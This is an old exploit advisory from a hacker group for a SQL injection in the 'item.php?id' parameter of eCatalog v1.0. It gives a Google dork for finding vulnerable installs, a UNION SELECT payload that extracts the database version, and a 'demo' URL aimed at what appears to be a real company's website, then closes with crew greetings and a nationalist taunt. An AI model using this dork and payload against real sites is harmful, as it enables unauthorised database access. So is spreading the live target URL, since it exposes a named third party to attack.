#############################################################
## eCatalog Software - item.php?id                         ##
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##
## Homepage : http://www.indonesiancoder.com               ##
## Date : Sunday, August 30, 2009                          ##
#############################################################

[ Software Information ]

[+] Software : eCatalog v1.0
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:item.php?id "eCatalog"

#############################################################

[ POC ]

http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

[ID] = Valid ID

[ Demo ]

http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

#############################################################

[ Greetings ]

[~] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut, Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[~] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola
[~] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem
[~] Kill-9 crew, kaMtiEz, arianom, tiw0L, Pathloader, RoNz and all of you.

[ QUOTE ]

O you MALINGSIAL, do not try to disturb us. We, the people of INDONESIA, stand ready to defend our country INDONESIA.